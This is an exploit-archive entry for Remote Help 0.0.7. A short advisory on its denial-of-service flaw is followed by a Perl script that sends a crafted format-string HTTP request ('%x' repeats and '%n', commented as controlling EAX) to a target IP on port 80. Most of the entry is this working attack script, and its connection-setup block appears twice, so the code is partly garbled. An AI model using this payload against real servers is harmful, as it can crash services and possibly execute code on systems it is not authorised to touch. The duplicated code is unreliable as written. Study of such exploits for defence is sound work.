1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
source: https://www.securityfocus.com/bid/38875/info Remote Help is prone to a denial-of-service vulnerability. Remote attackers can exploit this issue to cause the application to crash, denying service to legitimate users. Due to the nature of this issue arbitrary code-execution may be possible; however this has not been confirmed. Remote Help 0.0.7 is vulnerable; other versions may also be affected. # Exploit Title : Remote Help 0.0.7 Remote DoS # Date: 20 Mar 2010 # Author: Rick2600 (ricks2600[at]gmail{dot}com) # Bug found by: Rick2600 # Software Link : http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html # Version : 0.0.7 # OS: Windows # Tested on : XP SP2 En # Type of vuln: DoS # Greetz to : Corelan Security Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # # # Code : print "|------------------------------------------------------------------|\n"; print "| __ __ |\n"; print "| _________________/ /___ _____ / /________ _____ ___|\n"; print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n"; print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n"; print "||\n"; print "| http://www.corelan.be:8800 |\n"; print "||\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[+] DoS exploit for Remote Help 0.0.7 Http\n"; use IO::Socket; if ($#ARGV != 0) { print $#ARGV; print "\nusage: $0 <targetip>\n"; exit(0); } print "[+] Connecting to server $ARGV[0] on port 80\n\n"; $remote = IO::Socket::INET->new( Proto => "tcp", if ($#ARGV != 0) { print $#ARGV; print "\nusage: $0 <targetip>\n"; exit(0); } print "[+] Connecting to server $ARGV[0] on port 80\n\n"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr=> $ARGV[0], PeerPort=> "http(80)", ); unless ($remote) { die "Cannot connect to Remote Help daemon on $ARGV[0]\n" } print "[+] Connected!\n"; #CONTROL EAX $payload = "/index.html" . "%x" x 90 . "A" x 250 . "%x" x 186."%.999999x" x 15 ."%.199999x". "%nX" . "DCBA"; print "[+] Sending Malicious Request\n"; print $remote "GET $payload HTTP/1.1\r\n"; close $remote; |